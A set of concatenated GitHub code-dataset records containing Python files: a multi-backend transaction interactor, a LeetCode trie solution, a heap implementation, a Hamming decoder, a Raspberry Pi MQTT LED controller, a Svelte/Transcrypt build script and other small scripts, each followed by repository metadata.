执行各类数据操作。提交前,可多次调用。\n\n \"\"\"\n\n def apply(self, *args, **kwargs):\n \"\"\"\n 提交操作变更。\n\n \"\"\"\n self.renew_at_apply_prepare()\n ret = self.basic_apply()\n self.renew_at_applied()\n return ret\n\n @abstractmethod\n def basic_apply(self, *args, **kwargs):\n \"\"\"\n 核心变更提交操作。\n\n \"\"\"\n pass\n\n def setup_transactional_operations(self):\n dispatch_id = getattr(rt_context, 'dispatch_id', None)\n if dispatch_id:\n for record in self.operate_records:\n if not record.operate_id:\n record.operate_id = dispatch_id\n self.transactional_operations = TransactionalOperations(\n operations=self.operate_records, operate_id=dispatch_id\n )\n else:\n self.transactional_operations = TransactionalOperations(operations=self.operate_records)\n\n def renew_at_apply_prepare(self):\n check_dict = {}\n self.logger.info('Transaction with ID {} is preparing to apply.'.format(self.transaction_count))\n for item in self.operate_records:\n item.transaction_id = self.transaction_count\n item_dict = {\n name: getattr(item, name)\n for name in dir(item)\n if not name.startswith('__') and not callable(getattr(item, name))\n }\n mysql_table_name = item_dict.get('extra_', {}).get('mysql_table_name', None)\n if mysql_table_name:\n if mysql_table_name not in check_dict:\n check_dict[mysql_table_name] = []\n check_dict[mysql_table_name].append(item_dict)\n try:\n if not self.check_data_legality(check_dict):\n self.logger.exception('[check_lineage] Data sync is illegal: {}'.format(check_dict))\n except Exception as err:\n self.logger.exception('[check_lineage] check lineage occur error: {}'.format(err))\n self.transactional_operations.transaction_id = self.transaction_count\n self.transactional_operations.state = 'ApplyPrepare'\n self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n def renew_at_applied(self):\n self.logger.info('Transaction with ID {} is applied.'.format(self.transaction_count))\n self.transactional_operations.apply_time = datetime.now()\n self.transactional_operations.state = 'Applied'\n self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n def check_data_legality(self, check_dict):\n \"\"\"\n 检查同步数据的合法性\n check rules list:\n 1.监控data_processing_relation写入,检查血缘完整性\n \"\"\"\n if 'data_processing_relation' in check_dict and self.backends_in_use.get(BackendType.DGRAPH, False):\n return rt_context.dgraph_backend.check_lineage_integrity(\n check_dict['data_processing_relation'], self.sessions[BackendType.DGRAPH]\n )\n return True\n\n\nclass SingleInteractor(TransactionalDispatchMixIn, Interactor):\n \"\"\"\n 仅供单个后端使用的Interactor。\n \"\"\"\n\n backup_backend_support = True\n\n def __init__(self, backend_type, *args, **kwargs):\n if backend_type is BackendType.MYSQL:\n raise NotImplementedByBackendError(_('Edit function is not enabled in MySQL backend.'))\n self.backend_type = backend_type\n super(SingleInteractor, self).__init__(backends_in_use={self.backend_type: True}, *args, **kwargs)\n self.backend_session = self.sessions[self.backend_type]\n\n def dispatch(self, operate_records, batch=False):\n self.operate_records = operate_records\n self.batch = batch\n self.setup_transactional_operations()\n self.local_persistence.save(self.transactional_operations)\n with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n with self.backend_session:\n self.transactional_inner_dispatch()\n\n def invoke(self):\n setattr(rt_local, '{}_session_now'.format(self.backend_type.raw.value), self.backend_session)\n b = (\n BatchDGraphOrchestrator(backend_session=self.backend_session)\n if self.batch\n else SingleDGraphOrchestrator(backend_session=self.backend_session)\n )\n b.dispatch(self.operate_records)\n\n def basic_apply(self):\n ret = self.backend_session.commit()\n del self.sessions\n return ret\n\n\nclass ParallelInteractor(TransactionalDispatchMixIn, Interactor):\n \"\"\"\n 多个后端同时调度的Interactor。\n \"\"\"\n\n backup_backend_support = False\n\n def __init__(self, *args, **kwargs):\n super(ParallelInteractor, self).__init__(*args, **kwargs)\n self.available_backends = self.backends_in_use\n self.metric_store = {}\n self.mysql_gl, self.dgraph_gl, self.config_db_gl = None, None, None\n self.invoking_greenlets = []\n self.record_keys_lst = None\n\n def dispatch(self, operate_records, batch):\n self.operate_records = operate_records\n self.batch = batch\n self.setup_transactional_operations()\n self.local_persistence.save(self.transactional_operations)\n self.record_keys_lst = [item.operate_id if item.operate_id else item for item in operate_records]\n with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n try:\n # 针对多种后端启用情况,持有事务,执行数据交互操作\n for k, v in list(self.sessions.items()):\n v.__enter__()\n self.transactional_inner_dispatch()\n finally:\n # 任何状态下,子同步协程都应该在完成该函数调用时结束。\n killall(self.invoking_greenlets)\n for k, v in list(self.sessions.items()):\n v.__exit__(None, None, None)\n\n def invoke(self):\n self.invoking_greenlets = []\n if self.available_backends.get(BackendType.CONFIG_DB):\n g = gevent.spawn(inherit_local_ctx(self.renew_config_db, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n if self.available_backends.get(BackendType.MYSQL):\n g = gevent.spawn(inherit_local_ctx(self.interact_with_mysql, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n if self.available_backends.get(BackendType.DGRAPH):\n g = gevent.spawn(inherit_local_ctx(self.interact_with_dgraph, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n joinall(self.invoking_greenlets, raise_error=False)\n for item in self.invoking_greenlets:\n if not item.successful():\n item._raise_exception()\n\n def basic_apply(self):\n self.logger.info('sessions_this_time is {}'.format(self.sessions))\n if self.available_backends.get(BackendType.DGRAPH):\n with about_time() as t:\n self.sessions[BackendType.DGRAPH].commit()\n self.commit_metric(t, BackendType.DGRAPH.value)\n\n if self.available_backends.get(BackendType.CONFIG_DB, False):\n with about_time() as t:\n self.sessions[BackendType.CONFIG_DB].commit()\n self.commit_metric(t, BackendType.CONFIG_DB.value)\n\n if self.available_backends.get(BackendType.MYSQL, False):\n with about_time() as t:\n self.sessions[BackendType.MYSQL].commit()\n self.commit_metric(t, BackendType.MYSQL.value)\n\n del self.sessions\n\n def commit_metric(self, t, session_type):\n \"\"\"\n commit 统计。\n\n :param t: 时间\n :param session_type: session类型\n :return:\n \"\"\"\n self.logger.info(\n {\n 'session_type': '{}'.format(session_type),\n 'metric_type': 'session_commit',\n 'elapsed_time': t.duration,\n 'invoke_elapsed_time': self.metric_store.get('{}_invoke_elapsed_time'.format(session_type), 0.0),\n 'operate_ids': self.metric_store.get('{}_operate_ids'.format(session_type), []),\n },\n extra={'output_metric': True},\n )\n\n def interact_with_mysql(\n self,\n ):\n \"\"\"\n Interact with MySql\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('mysql interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.MYSQL]\n mysql_b = (\n BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n if self.batch\n else MySQLReplicaOrchestrator(backend_session=mysql_session)\n )\n with about_time() as t:\n mysql_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'mysql', 'interactor_dispatch', t, self.metric_store)\n\n def interact_with_dgraph(self):\n \"\"\"\n Interact with Dgraph\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('dgraph interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.dgraph_session_now = dgraph_session = self.sessions[BackendType.DGRAPH]\n dgraph_b = (\n BatchDGraphOrchestrator(backend_session=dgraph_session)\n if self.batch\n else SingleDGraphOrchestrator(backend_session=dgraph_session)\n )\n with about_time() as t:\n dgraph_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'dgraph', 'interactor_dispatch', t, self.metric_store)\n\n def renew_config_db(\n self,\n ):\n \"\"\"\n Interact with ConfigDB\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('config_db interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.CONFIG_DB]\n mysql_b = (\n BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n if self.batch\n else MySQLReplicaOrchestrator(backend_session=mysql_session)\n )\n with about_time() as t:\n mysql_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'config_db', 'interactor_dispatch', t, self.metric_store)\n\n def sync_metric(self, record_id_lst, backend_type, metric_type, cost, metric_store=None):\n if metric_store is not None:\n metric_store['{}_invoke_elapsed_time'.format(backend_type)] = cost.duration\n metric_store['{}_operate_ids'.format(backend_type)] = record_id_lst\n self.logger.info(\n {\n 'record_ids': record_id_lst,\n 'backend_type': backend_type,\n 'metric_type': metric_type,\n 'elapsed_time': cost.duration,\n },\n extra={'output_metric': True},\n )\n","repo_name":"Tencent/bk-base","sub_path":"src/datamgr/metadata/metadata/interactor/interact.py","file_name":"interact.py","file_ext":"py","file_size_in_byte":14376,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"}
+{"seq_id":"38927412600","text":"#\r\n# @lc app=leetcode id=211 lang=python3\r\n#\r\n# [211] Design Add and Search Words Data Structure\r\n#\r\n\r\n# @lc code=start\r\n\r\nclass TrieNode():\r\n\r\n def __init__(self):\r\n self.children = [None] * 128\r\n self.end = False\r\n\r\n def set_char(self, char):\r\n index = ord(char)\r\n node = TrieNode()\r\n self.children[index] = node\r\n return node\r\n\r\n def get_child(self, char):\r\n index = ord(char)\r\n return self.children[index]\r\n\r\n\r\nclass Trie:\r\n \"\"\"\r\n noob implement\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.root = TrieNode()\r\n\r\n def insert(self, word: str) -> None:\r\n \"\"\"\r\n Inserts a word into the trie.\r\n \"\"\"\r\n head = self.root\r\n for w in word:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n head = head.set_char(w)\r\n head.end = True\r\n\r\n def search(self, root, word: str, index) -> bool:\r\n \"\"\"\r\n Returns if the word is in the trie.\r\n \"\"\"\r\n print(word[index:])\r\n if index == len(word):\r\n return root.end\r\n\r\n head = root\r\n for i in range(index, len(word)):\r\n w = word[i]\r\n if w == \".\":\r\n for c in head.children:\r\n if c and self.search(c, word, i+1):\r\n return True\r\n return False\r\n else:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return head.end\r\n\r\n def startsWith(self, prefix: str) -> bool:\r\n \"\"\"\r\n Returns if there is any word in the trie that starts with the given prefix.\r\n \"\"\"\r\n head = self.root\r\n for w in prefix:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return True\r\n\r\n\r\nclass WordDictionary:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.trie = Trie()\r\n\r\n def addWord(self, word: str) -> None:\r\n \"\"\"\r\n Adds a word into the data structure.\r\n \"\"\"\r\n self.trie.insert(word)\r\n\r\n def search(self, word: str) -> bool:\r\n \"\"\"\r\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\r\n \"\"\"\r\n return self.trie.search(self.trie.root, word, 0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = WordDictionary()\r\n s.addWord(\"bad\")\r\n print(s.search(\"b.d\"))\r\n\r\n# Your WordDictionary object will be instantiated and called as such:\r\n# obj = WordDictionary()\r\n# obj.addWord(word)\r\n# param_2 = obj.search(word)\r\n# @lc code=end\r\n","repo_name":"huhudev-git/leetcode","sub_path":"211.design-add-and-search-words-data-structure.py","file_name":"211.design-add-and-search-words-data-structure.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39108269451","text":"import matplotlib.pyplot as plt\r\nimport csv, random\r\nfrom datetime import datetime\r\n\r\nfilename= 'aboration_rate.csv'\r\nwith open(filename) as f:\r\n reader = csv.reader(f)\r\n header_row = next(reader)\r\n\r\n for index, data in enumerate(header_row):\r\n print(index, data)\r\n\r\n abortion, ages, period = [], [], []\r\n\r\n for row in reader:\r\n period.append(row[0])\r\n abortion.append(float(row[2]))\r\n ages.append(row[1])\r\n\r\nfig = plt.figure(dpi=128)\r\ncolors = ['red', 'blue', 'green', 'lightblue', 'yellow', 'darkgreen', 'darkblue', 'violet']\r\nx=0\r\ny=9\r\nyear = 2000\r\nfor i in range(19):\r\n plt.plot(ages[x:y], abortion[x:y], c=random.choice(colors), label=str(year))\r\n x+=8\r\n y+=8\r\n year+=1\r\n\r\nplt.title(\"Aboration rate from 2000 to 2018\", fontsize=24)\r\nplt.xlabel(\"Women age\", fontsize=14)\r\nplt.ylabel(\"Aboration Rate\", fontsize=14)\r\nplt.tick_params(axis='both', labelsize=14)\r\nfig.autofmt_xdate()\r\nplt.legend()\r\nplt.show()\r\n\r\n","repo_name":"AliAhmed15245/Data-visualiztion-python","sub_path":"csv files visualization/aboration_rate.py","file_name":"aboration_rate.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3824225489","text":"\"\"\"\nModule to confirm the integrity of the timestamped document\n\"\"\"\nfrom pyasn1.type import univ\nfrom pyasn1.codec.der import decoder\nimport hashlib\nfrom rfc3161 import TimeStampResp, TSTInfo\n\nTSR_FILE = 'READ_ME__txt.tsr'\nFILE = 'READ_ME_.txt'\n\ndigest_algorithms = {\n univ.ObjectIdentifier('1.3.14.3.2.26'): 'sha1',\n univ.ObjectIdentifier('1.2.840.113549.2.5'): 'md5',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.1'): 'sha256',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.2'): 'sha384',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.3'): 'sha512'\n}\n\n\ndef main(tsr: str, file: str):\n \"\"\"\n :param tsr: Verified timestamp response filepath\n :param file: Original document path\n :return:\n \"\"\"\n print('Confirming the integrity of original document...')\n try:\n response, _ = decoder.decode(open(tsr, 'rb').read(), asn1Spec=TimeStampResp())\n\n e_content = response['timeStampToken']['content']['encapContentInfo']['eContent']\n tst_info, _ = decoder.decode(e_content, asn1Spec=TSTInfo())\n\n if tst_info['messageImprint']['hashAlgorithm']['algorithm'] in digest_algorithms:\n hash_str = digest_algorithms.get(tst_info['messageImprint']['hashAlgorithm']['algorithm'])\n else:\n print(f'The hash algorithm is not listed', str(tst_info['messageImprint']['hashAlgorithm']['algorithm']))\n return False\n\n hash_tst = tst_info['messageImprint']['hashedMessage']\n\n hash_obj = hashlib.new(hash_str)\n\n with open(file, 'rb') as doc:\n hash_obj.update(doc.read())\n\n print('TSTInfo hashedMessage: ', hash_tst.asOctets().hex())\n print('Hash of original file: ', hash_obj.digest().hex())\n\n assert hash_tst.asOctets() == hash_obj.digest()\n return True\n except Exception as e:\n print('The file has changed since the date in TSTInfo', e)\n\n return False\n\n\nif __name__ == '__main__':\n main(TSR_FILE, FILE)\n","repo_name":"NuqieNoila/dts_client","sub_path":"confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70114487401","text":"#\n# https://leetcode.com/explore/learn/card/heap/643/heap/4017/\n#\n#\n\nfrom typing import List\nimport sys\nimport pdb\nbr = pdb.set_trace\n\nsolution_json = {\n \"date\": \"2022/10/4\",\n \"design\": 0,\n \"coding\": 0,\n \"runtime\": \"?? ms\",\n \"fasterThan\": \"\",\n \"memory\": \"?? MB\" \n}\n\nclass Solution:\n def __init__(self):\n self.module = sys.modules[__name__]\n\n\"\"\"\n 0\n 1 2\n 3 4 5 6\n\"\"\"\n\ndef parent(i):\n if i % 2 == 0:\n return (i - 1) // 2\n else:\n return i // 2\n\ndef left(i):\n return i * 2 + 1\n\ndef right(i):\n return (i + 1) * 2 \n\n\"\"\"\n 3 1 \n 1 ---> 3 \n\"\"\"\n\ndef heapify(a):\n n = len(a)\n i = n - 1\n while True:\n if i == 0:\n break\n\n if a[i] < a[parent(i)]:\n swap(a, i, parent(i))\n i = parent(i)\n else:\n break\n\ndef swap(a, i, j):\n a[i], a[j] = a[j], a[i] \n\n'''\n 10 10 10\n 3 5 3 20 5 3 \n'''\ndef down_heapify(a):\n n = len(a)\n i = 0 \n while True:\n idx = None \n if left(i) <= n - 1:\n if a[left(i)] < a[i]:\n idx = left(i)\n\n if right(i) <= n - 1:\n if a[right(i)] < a[i]:\n if idx == None:\n idx = right(i)\n else:\n if a[right(i)] < a[idx]:\n idx = right(i)\n\n if idx == None:\n break\n\n swap(a, idx, i)\n i = idx \n\n#\n# Implementing \"Min Heap\"\n#\n\nclass MinHeap:\n def __init__(self, heapSize):\n self.a = []\n self.max = heapSize\n pass\n\n #\n # Example:\n # obj = MinHeap()\n # ...\n # print(str(obj))\n # [1,2,3]\n #\n\n def __str__(self):\n return \"%s\" % self.a \n\n def dump(self):\n print('%s' % self.a)\n\n #\n # Function to add an element\n # element >= 1\n # \n \"\"\"\n 3\n 1 2\n \"\"\"\n def add(self, element):\n self.a.append(element)\n heapify(self.a)\n pass\n \n #\n # Get the top element of the Heap\n #\n\n def peek(self):\n return self.a[0]\n \n #\n # Delete the top element of the Heap\n #\n\n def pop(self):\n last_i = len(self.a) - 1\n swap(self.a, 0, last_i)\n min_v = self.a.pop()\n down_heapify(self.a)\n return min_v\n \n #\n # return the number of elements in the Heap\n #\n\n def size(self):\n return 0\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_07_heap/solutions/my001-min-heap-s2.py","file_name":"my001-min-heap-s2.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70782457641","text":"import argparse\nimport contextlib\nimport numpy as np\n\nfrom inout_bits import BitInputStream, BitOutputStream\n\n\nCORRECTION_MATRIX = np.array([[0, 0, 0, 1, 1, 1, 1],\n [0, 1, 1, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 0, 1]])\n\n\ndef parse_arguments():\n \"\"\"\n Handle and parse program arguments.\n\n Returns:\n argparse.Namespace: namespace with 2 parsed arguments:\n - in1 -- one input file\n - in2 -- another input file\n \"\"\"\n arg_parser = argparse.ArgumentParser(\n description='Kodowanie pliku korzystająć z rozszerzonego kodu Hamminga (8, 4)'\n )\n\n arg_parser.add_argument(\n 'input_file',\n help='Plik wejściowy',\n\n )\n\n arg_parser.add_argument(\n 'output_file',\n help='Zakodowany plik wyjściowy'\n )\n\n return arg_parser.parse_args()\n\n\nclass HammingDecoder:\n def __init__(self):\n self.doubleErrorCounter = 0\n\n def decode(self, bit_array):\n parity = bit_array[-1]\n bit_array = bit_array[:-1]\n wrong_bit = np.dot(CORRECTION_MATRIX, bit_array) % 2\n wrong_bit = int(f\"0b{''.join(map(str, wrong_bit))}\", 2)\n\n if wrong_bit > 0:\n if parity == 0:\n self.doubleErrorCounter += 1\n else:\n if wrong_bit < 5:\n bit_array[wrong_bit-1] = int(not bit_array[wrong_bit-1])\n\n return bit_array[:4]\n\n\ndef decode():\n \"\"\"Decode file with Hamming coding.\"\"\"\n args = parse_arguments()\n hc = HammingDecoder()\n with contextlib.closing(BitInputStream(open(args.input_file, \"rb\"))) as bit_in, \\\n contextlib.closing(BitOutputStream(open(args.output_file, \"wb\"))) as bit_out:\n bits = bit_in.bits_array(8)\n while bits.size > 0:\n bit_out.write_array(hc.decode(bits))\n bits = bit_in.bits_array(8)\n print(\"Zdekodowano\")\n print(\"Liczba podwójnych błędów:\", hc.doubleErrorCounter)\n\n\nif __name__ == \"__main__\":\n decode()\n","repo_name":"barchuckie/co-co","sub_path":"zad7/dekoder.py","file_name":"dekoder.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10944001651","text":"# Luke Chase\n# Updated Alice_Words program --- Assessment Program\n# Computer Science II\n# October 1, 2017\ntry:\n file = open(\"Alice's_Adventures_In_Wonderland_via_Gutenberg.txt\", \"r\")\n file = file.read()\n def sort(text):\n dictionary = {}\n alphabetical_dictionary = {}\n word = \"\"\n for aline in text:\n letter = aline\n if letter!= \" \":\n word = word + letter\n else:\n dictionary[word] = text.count(word)\n word = \"\"\n key_list = list(dictionary.keys())\n key_list = sorted(dictionary)\n begin = key_list.index(\"A\")\n for i in key_list[begin:]:\n alphabetical_dictionary[i] = text.count(i)\n return alphabetical_dictionary\n\n dictionary = print(sort(file))\n\n try:\n text_thing = open(\"GET_WRITTEN_ON_YA_ALICE\", \"w\")\n try:\n text_thing.write(str(dictionary))\n finally:\n text_thing.close()\n finally:\n text_thing.close()\nexcept IOError:\n print(\"This file is not found.\")\n","repo_name":"SlyesKimo123/ComputadoraScience2","sub_path":"Assessment/Assessment Program(Alice_Words).py","file_name":"Assessment Program(Alice_Words).py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74907586921","text":"# from http.server import HTTPServer, SimpleHTTPRequestHandler\nfrom distutils.dir_util import copy_tree\nfrom livereload import Server\nfrom pathlib import Path\nimport contextlib\nimport subprocess\nimport shutil\nimport glob\nimport sys\nimport os\n\nRELEASE_MODE = len(sys.argv) >= 2 and sys.argv[1] == \"--release\"\n\n\ndef supress_stdout(func):\n def wrapper(*a, **ka):\n with open(os.devnull, 'w') as devnull:\n with contextlib.redirect_stdout(devnull):\n func(*a, **ka)\n return wrapper\n\n\ndef make_required_directories():\n Path(\"./build/smooth/__target2__\").mkdir(exist_ok=True, parents=True)\n Path(\"./output\").mkdir(exist_ok=True, parents=True)\n\n\ndef js_to_py(filename):\n return str(filename).replace(\".js\", \".py\")\n\n\ndef js_to_svelte(filename):\n return str(filename).replace(\".js\", \".svelte\")\n\n\ndef copy_to_svelte_project_dir():\n for f in glob.glob('./src/*.*'):\n shutil.copy(f, './build/src')\n for f in glob.glob('./src/pages/*.svelte'):\n shutil.copy(f, './build/src/pages')\n\n\ndef copy_to_root():\n for f in glob.glob('./src/root/*'):\n shutil.copy(f, './output')\n\n\ndef run_transcrypt():\n for f in glob.glob(\"./build/smooth/pages/*.py\"):\n cmd = f\"python ./cryptic/src/__main__.py -b -n -g {f}\"\n subprocess.run(cmd, shell=True, stdout=open(os.devnull, \"w\"))\n copy_tree(\"./build/smooth/pages/__target__\",\n \"./build/smooth/__target2__\")\n\n\ndef append_transpiled_python():\n files = glob.glob(\"./build/smooth/__target2__/*.js\")\n for f in files:\n if \"org.transcrypt.__runtime__\" in f:\n shutil.copy(f, './build/src/pages')\n continue\n with open(f, \"r\") as reader:\n file_contents = reader.read()\n file_contents = \"\"\n file_name = Path(f).name\n svelte_file_name = js_to_svelte(file_name)\n with open(f\"./build/src/pages/{svelte_file_name}\", \"a\") as writer:\n writer.write(\"\")\n writer.write(file_contents)\n\n\ndef rollup():\n if RELEASE_MODE:\n subprocess.run(\"npm run build-prod\", cwd=\"./build\", shell=True)\n else:\n subprocess.run(\"npm run build-dev\", cwd=\"./build\", shell=True)\n\n\ndef run(port=4200):\n server = Server()\n server.watch('src', refresh)\n server.serve(port=port, root='output')\n\n\ndef refresh():\n copy_tree(\"./src\", \"./build/smooth\")\n make_required_directories()\n run_transcrypt()\n copy_to_svelte_project_dir()\n copy_to_root()\n append_transpiled_python()\n rollup()\n\n\nif __name__ == \"__main__\":\n refresh()\n if not RELEASE_MODE:\n run()\n","repo_name":"chris-koch-penn/smooth.py","sub_path":"smoothie.py","file_name":"smoothie.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"11409363752","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\nimport threading\r\nimport random\r\nimport RPi.GPIO as GPIO\r\nfrom registration import *\r\nfrom MyMQTT import *\r\n\r\n# The RPi controls a LED which is activated based on the freezing status\r\n# MQTT methods:\r\n# subscriber to retrieve info on the freezing status \r\n\r\nclass RPi():\r\n def __init__(self,broker,port,topic, LED_red, LED_green, LED_white):\r\n self.client=MyMQTT('RPI',broker,port,self)\r\n self.topic=topic\r\n self.LED_red = LED_red\r\n self.LED_green = LED_green\r\n self.LED_white = LED_white\r\n self.client.start()\r\n self.client.mySubscribe(self.topic)\r\n def stop(self):\r\n self.client.stop() \r\n def notify(self,payload): \r\n alert = json.loads(payload)\r\n dataIncoming = alert['result'] \r\n # format message: 1 for freezing for sure, 2 for possible freezing, 3 no freezing \r\n \r\n # Initialitation - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW) \r\n\r\n if dataIncoming == 1: \r\n # 1 = freezing for sure\r\n print('Freezing for sure')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds\r\n while end - start < 5:\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led is switched on, because the user can be absent or not notice it -> more awarness\r\n\r\n elif dataIncoming == 2: \r\n # 2 = possible freezing\r\n print('Possible freezing')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds \r\n while end - start < 5:\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led is switched on, because the user can be absent or not notice it -> more awarness\r\n \r\n else:\r\n print('No freezing')\r\n GPIO.output(self.LED_green, GPIO.HIGH) # green led is switched on in order to \r\n\r\n\r\nclass Update(threading.Thread): # Multithreading for doing the update\r\n def __init__(self, threadID,time_update,sr):\r\n threading.Thread.__init__(self)\r\n self.threadID = threadID\r\n self.time_update=time_update\r\n self.sr=sr\r\n def run(self):\r\n while True:\r\n self.sr.update()\r\n time.sleep(self.time_update)\r\n\r\n\r\nif __name__=='__main__':\r\n # 1. SERVICE REGISTRATION to catalog \r\n conf = json.load(open('settings.json')) # read data from settings.json\r\n payload = conf[\"ServiceData\"] # retrieve service data\r\n catalog_URL=conf[\"catalogURL\"] # retrieve catalog url\r\n service = registration(catalog_URL, payload)\r\n try: \r\n service.register()\r\n except:\r\n print('Catalog not connected!')\r\n raise SystemExit\r\n\r\n subscribeTopic = conf[\"ServiceData\"][\"MQTT_Topic\"]\r\n info=(requests.get(catalog_URL+\"/broker\")).json()\r\n\r\n # Set up the Raspberry pi\r\n # set up pin numbering\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setwarnings(False)\r\n\r\n # Assign a pin number to every led corresponding to the raspberry pi header\r\n LED_red = 7 #GPIO4\r\n LED_green = 11 #GPIO17\r\n LED_white = 13 #GPIO27\r\n\r\n # Set the output to the correct pin\r\n GPIO.setup(LED_red, GPIO.OUT)\r\n GPIO.setup(LED_green, GPIO.OUT)\r\n GPIO.setup(LED_white, GPIO.OUT)\r\n\r\n # Initialitation - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW)\r\n\r\n rpi=RPi(info['broker'][\"url\"],info['broker'][\"port\"],subscribeTopic, LED_red, LED_green, LED_white) \r\n t1 = Update(1,conf['timeforupdate'],service) #updating the timestamp of the service \r\n t1.start()\r\n t1.join()\r\n\r\n while True:\r\n time.sleep(10)\r\n","repo_name":"Joseph9994/Agropy","sub_path":"RPi/Rpi.py","file_name":"Rpi.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"5119021857","text":"import psycopg2\nimport time\n\nfrom Connection import Connection, Listener\nfrom functools import partial\nfrom handlers.request_handlers import list_products, create_product, create_db, seed_db\n\nif __name__ == \"__main__\":\n conn = psycopg2.connect(host=\"postgres\", port=5432, user=\"postgres\")\n request_handlers = {\n \"list-products\": partial(list_products, conn),\n \"create-product\": partial(create_product, conn),\n \"create-database\": partial(create_db, conn),\n \"seed-database\": partial(seed_db, conn),\n }\n c = Connection(\n \"main-queue\",\n \"control-queue\",\n 61613,\n Listener(request_handlers=request_handlers),\n \"warehouse-message-handler\",\n )\n\n while True:\n # keep app running to prevent docker from terminating\n time.sleep(0.01)\n","repo_name":"StefanEvanghelides/eai2019","sub_path":"WarehouseMessageHandler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
